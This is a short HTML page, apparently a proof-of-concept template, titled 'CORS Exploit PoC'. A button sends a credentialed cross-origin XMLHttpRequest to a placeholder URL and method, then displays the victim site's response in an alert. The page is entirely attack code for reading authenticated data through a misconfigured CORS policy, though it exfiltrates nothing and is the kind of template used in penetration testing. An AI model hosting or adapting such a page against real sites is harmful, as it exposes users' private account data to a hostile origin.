<html>
<center>
<h2>CORS Exploit PoC</h2>
<div id="test">
<button type="button" onclick="cors()">Try Me!</button>
</center>
</div>
 
<script>
function cors() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      document.getElementById("test").innerHTML = alert(this.responseText);
    }
  };
  xhttp.open("REQTYPE", "https://URL", true);
  xhttp.withCredentials = true;
  xhttp.send();
}
</script>
</html>
 